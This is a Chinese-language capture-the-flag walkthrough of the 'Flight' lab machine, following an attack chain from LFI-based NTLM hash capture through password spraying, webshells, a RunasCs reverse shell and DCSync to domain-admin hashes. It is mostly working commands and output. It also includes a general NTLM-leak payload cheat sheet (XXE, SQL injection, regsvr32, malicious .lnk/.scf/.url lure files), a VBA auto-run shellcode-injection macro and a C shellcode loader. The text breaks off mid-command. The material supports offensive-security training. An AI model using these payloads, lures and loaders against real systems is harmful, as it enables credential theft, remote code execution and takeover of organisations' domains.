[Meachines] [Hard] Flight LFI+NTLM-Leak+SID+SMBD+ntlm_theft+RunasCS+KTOR+Virtual-Account-DCSYNC
字数 1670 2025-08-29 22:41:39
Windows域渗透技术深度解析:从信息收集到DCSync攻击
1. 信息收集阶段
1.1 初始扫描
使用nmap和masscan进行端口扫描:
ip='10.10.11.187'; itf='tun0'
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
nmap -Pn -sV -sC -p "$ports" "$ip"
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
fi
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
扫描结果:
- 53/tcp: DNS
- 80/tcp: HTTP (Apache 2.4.52)
- 88/tcp: Kerberos
- 135/tcp: MSRPC
- 139/tcp: NetBIOS
- 389/tcp: LDAP (Active Directory)
- 445/tcp: SMB
- 其他端口:464, 593, 636, 3268, 3269, 9389等
1.2 子域名枚举
使用自定义脚本进行子域名枚举:
echo '10.10.11.187 flight.htb' >> /etc/hosts
./ffbuster.sh -u 'http://flight.htb' -i '10.10.11.187'
发现子域名:
- http://school.flight.htb/
1.3 LDAP匿名查询测试
尝试匿名LDAP查询:
ldapsearch -x -H ldap://10.10.11.187 -b "dc=flight,dc=htb" "(objectClass=*)"
ldapsearch -x -H ldap://10.10.11.187 -b "dc=school,dc=flight,dc=htb" "(objectClass=*)"
结果:需要认证
1.4 SMB枚举
列出SMB共享:
smbclient -L //10.10.11.187 -m SMB2
1.5 DNS查询
查询DNS记录:
dig @10.10.11.187 flight.htb ANY
发现主DNS服务器:g0.flight.htb
2. 漏洞利用阶段
2.1 LFI漏洞利用与NTLM泄露
在school.flight.htb发现LFI漏洞:
http://school.flight.htb/Index.php?view=C:/windows/win.ini
利用LFI触发NTLM认证泄露:
- 启动Responder:
responder -I tun0
- 触发NTLM认证:
curl http://school.flight.htb/Index.php?view=//10.10.16.3/SEND
获取到的NTLM哈希:
svc_apache::flight:25a841660b3964af:0B7644643AE119976A7F7D72C07F85E5:010100000000000000AF3B5FBEBFDB01E677529BA37425E60000000002000800490035003200440001001E00570049004E002D0047004300500045004C004300490031004A004A00510004003400570049004E002D0047004300500045004C004300490031004A004A0051002E0049003500320044002E004C004F00430041004C000300140049003500320044002E004C004F00430041004C000500140049003500320044002E004C004F00430041004C000700080000AF3B5FBEBFDB01060004000200000008003000300000000000000000000000003000007F658D108DDF4A13040D3754A755633B13D25387A2501C4E5852ACC585B2A2C60A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0033000000000000000000
使用Hashcat破解:
hashcat -m 5600 -a 0 hashes.txt rockyou.txt
获取凭证:
- 用户名:svc_apache
- 密码:S@Ss!K@*t13
2.2 SMB枚举与SID收集
使用获取的凭证枚举SMB:
smbmap -H 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'
发现共享:NETLOGON, Shared, SYSVOL, Users, Web
使用lookupsid.py收集SID信息:
lookupsid.py 10.10.11.187/svc_apache:'S@Ss!K@t13'@10.10.11.187
发现多个用户账户,包括:
- Administrator
- Guest
- krbtgt
- Domain Admins
- svc_apache
- S.Moon
- C.Bum等
2.3 密码喷洒攻击
使用CrackMapExec进行密码喷洒:
crackmapexec smb 10.10.11.187 -u ./users -p 'S@Ss!K@*t13' --continue-on-success
发现用户S.Moon使用相同密码
2.4 NTLM泄露技术总结
多种触发NTLM泄露的技术:
- LFI漏洞:
http://host.tld/?page=//11.22.33.44/@OsandaMalith
- XXE漏洞:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >]>
<root>
<name></name>
<tel></tel>
<email>OUT&xxe;OUT</email>
<password></password>
</root>
- XPath注入:
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
- MySQL注入:
http://host.tld/index.php?id=1' union select 1,2,load_file('\\\\192.168.0.100\\@OsandaMalith'),4;%00
- Regsvr32:
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
- 批处理文件:
echo 1 > //192.168.0.1/abc
pushd \\192.168.0.1\abc
cmd /k \\192.168.0.1\abc
cmd /c \\192.168.0.1\abc
start \\192.168.0.1\abc
mkdir \\192.168.0.1\abc
type \\192.168.0.1\abc
dir \\192.168.0.1\abc
- Autorun.inf:
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
- SCF文件:
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
[Taskbar]
Command=ToggleDesktop
- Desktop.ini:
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
- 快捷方式文件(.lnk):
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "StealMyHashes.lnk"))
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
- PowerShell:
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "$env:windir\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
- Internet快捷方式(.url):
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
- 注册表自动运行:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
- Word/Excel宏:
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Long, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As Long, _
ByRef Source As Any, _
ByVal Length As Long) As Long
#End If
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Sub Auto_Open()
Dim source As Long, i As Long
#If Vba7 Then
Dim lpMemory As LongPtr, lResult As LongPtr
#Else
Dim lpMemory As Long, lResult As Long
#End If
Dim bShellcode(376) As Byte
' Shellcode here...
lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
For i = LBound(bShellcode) To UBound(bShellcode)
source = bShellcode(i)
lResult = RtlMoveMemory(lpMemory + i, source, 1)
Next i
lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
- C Shellcode:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main() {
char *shellcode = "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
// ... more shellcode ...
"\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
DWORD oldProtect;
wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
if (!ret) {
fprintf(stderr, "%s", "Error Occured");
return EXIT_FAILURE;
}
((void(*)(void))shellcode)();
VirtualProtect(shellcode, strlen(shellcode), oldProtect, &oldProtect);
return EXIT_SUCCESS;
}
2.5 使用ntlm_theft生成恶意文件
python3 ntlm_theft.py -g all -s 10.10.16.3 -f exp
上传到SMB共享并等待用户访问:
smbclient //10.10.11.187/shared -U S.Moon 'S@Ss!K@*t13'
smb: \> prompt off
smb: \> mput *
捕获到的NTLM哈希:
c.bum::flight.htb:e7919f91ff88c3c3:BBDD5BEBDFF1CD50819EAD1E726372C2:010100000000000080F3FEC6D8BFDB01FD44891AF8139BBE0000000002000800470037004A00580001001E00570049004E002D004600450042004500440042005700580037005900350004003400570049004E002D00460045004200450044004200570058003700590035002E00470037004A0058002E004C004F00430041004C0003001400470037004A0058002E004C004F00430041004C0005001400470037004A0058002E004C004F00430041004C000700080080F3FEC6D8BFDB01060004000200000008003000300000000000000000000000003000007F658D108DDF4A13040D3754A755633B13D25387A2501C4E5852ACC585B2A2C60A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0033000000000000000000
破解哈希:
hashcat -m 5600 -a 0 hashes.txt rockyou.txt
获取凭证:
- 用户名:c.bum
- 密码:Tikkycoll_431012284
3. 横向移动
3.1 获取初始shell
使用p0wny-shell获取webshell:
smbclient //10.10.11.187/Web -U c.bum 'Tikkycoll_431012284'
smb: \> cd school.flight.htb
smb: \school.flight.htb\> put p0wny.php
访问:
http://school.flight.htb/p0wny.php
3.2 使用RunasCS提升权限
下载并执行RunasCS:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/RunasCs.exe' -OutFile 'RunasCs.exe'"
RunasCs.exe c.bum Tikkycoll_431012284 -r 10.10.16.3:443 powershell
获取user.txt:
0d28859d267bd9b701fdedb4b5b1df0c
3.3 使用KTOR探测内网服务
KTOR是一个PowerShell脚本,用于探测本地内网开放的HTTP服务器:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/ktor.ps1' -OutFile 'ktor.ps1'"
.\ktor.ps1 -Local
发现:
- 127.0.0.1:80 - HTTP detected - Title: g0 Aviation
- 127.0.0.1:8000 - HTTP detected - Title: Flight - Travel and Tour
3.4 使用Chisel建立隧道
- 启动Chisel服务器:
chisel server -p 8888 --reverse
- 客户端连接:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/chisel.exe' -OutFile 'chisel.exe'"
.\chisel.exe client 10.10.16.3:8888 R:8001:127.0.0.1:8000
访问内部服务:
http://127.0.0.1:8001/
3.5 上传ASPX Webshell
检查目录权限:
icacls development
上传ASPX webshell:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/shell.aspx' -OutFile 'shell.aspx'"
访问:
http://127.0.0.1:8001/shell.aspx
4. 权限提升
4.1 使用Rubeus进行Kerberos攻击
- 获取域控制器信息:
nltest /dsgetdc:flight.htb
发现域控制器:g0.flight.htb
- 下载Rubeus:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/Ad-Domain/Rubeus.exe' -OutFile 'Rubeus.exe'"
- 执行TGT委派攻击:
.\Rubeus.exe tgtdeleg /nowrap
获取到的Kerberos TGT:
doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECirDVsk/28IziMZVuL1w4suFGMiiOfDqPcwvpyZS1mpdlrNv/Qt32qdlUHFrX9mpxfX/t9Wrxp+vPOxzHkP4f3FuRkX6hnwAI2ErkGVwi1t/d2f8cXYrRAtMppZiDmcHGogdAN0BuC+RC3OV5ohkk4ppzRiT11f/f0CrI/BtSdVBWgpIL4srt5IyJdeXZWZjOhvjkM3IJR70I0ahZh6vYinY3tg+kyk36zgAm4rUhJyh67OWQULtUDnXWK3RE4hU9Dh25SxbuzKOAaivB5C89Di5hQAkhWW9EqEz3E0/QDOFdsFzPcbVBWAEmNuwW6eZvJ/joUcaawonOt+f8mn8N/oZt114qugq+Ea3/O0TbGRKZwwdvsYeuIcDNP6dNx+RQPPKESp2tXosylf3gP0zemFrvm7+sFgv9DRsmDy/hdYFhPDatUGt9rX7jglAi5SqnacMIJehG+aVDv019DudQQq7otARZWI2S5Iq7r7XBZPVxnRunecQ1KXFoJzZD95Y8EjsEv1Wqazg97v2GXvfrxaHKLC+i6d0oUa47uiRYyrbinJlws6SwJ5jEwbS6412HwtympvjWGm7U5hEdeSoKJ1TJKM5UmQM7hkB+kKEgeTZQ7l4kHPBbufEJmMdh0qRdEWt2X/1jzH607OAVEALSchUDYOFJSGuqc/Glb8p/QJqS167mS8ATZH/epuvO5WPzjMXf1EOLxvNfdKHtW7KS7/JYOZ+QVa4UhcOfien4J4IYkxZFcb8hDvQ7Bs1nyrcgvhFZ2cUK3mT2E44wLLIR4Bw5XiBX/g0uRLYS+X6IF8CYyQNzKoxotgpzkh6V4izMGGqzCxMw5w1j2wOj0mxCXYJ323uoML9FWKSlOvx2FNQgIZv5M8BAaBKKXZpBwEcuChLR3RlQXTJ/ncQtc6s8RwCwDk6jWxMIjk7fuFp19rVNffFE9ltBeUKam00cx0UKfCi9xSGVLG0ATDrcylNjRzui2MBf4X7xE9TnU6WnIt2wzIxQUQEvUQlFTA5kWgvlXmSC50ApalNI979R7zVTpeGJ67smEzWjr8uXUSLjuz7m+luFz9ZvmnDdfBi7WufJZp6ptMOzfPibdGHLhMv3Zbgz2FbPiGH7hlsZLxdfTLTjvSsxCPJ4C+OQTnaLECARNPlf/CYavAR3O8XGtaCoBTGnoNkX9Vx94qdv4EA2QjnuCeJN5nXygENA4mj4jFRBfrJ1pPnbmk8HDfKUA4hVRIx8Wn5YHdsNx1o148OGVL28Updt+QZrGij6UdE8RUmhOIk6HMP66Fvj+st0vdcHsbMf7G94CK+O1Zxd32a7yPm9u0CGaT08630tlTjOR5OEso4ZgB/+BNczU746Fvef11PdpwLxNRjXSa+o4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgh/7tRpnqQ1n4fiF/dWqB3ClpkvNGzh8HT4PO4XWxCx2hDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MDUwODIxMDM1NVqmERgPMjAyNTA1MDkwNzAzNTVapxEYDzIwMjUwNTE1MjEwMzU1WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC
4.2 使用minikerberos转换票据格式
minikerberos-kirbi2ccache /tmp/ticket.kirbi /tmp/ticket.ccache
export KRB5CCNAME=ticket.ccache
4.3 DCSync攻击
- 同步AD域控时间:
sntp flight.htb
- 执行DCSync攻击:
secretsdump.py -k -no-pass g0.flight.htb -just-dc-user administrator
获取到的管理员哈希:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
4.4 获取最终权限
使用psexec获取管理员shell:
psexec.py administrator@flight.htb -hashes aad3b435b51404eeaad3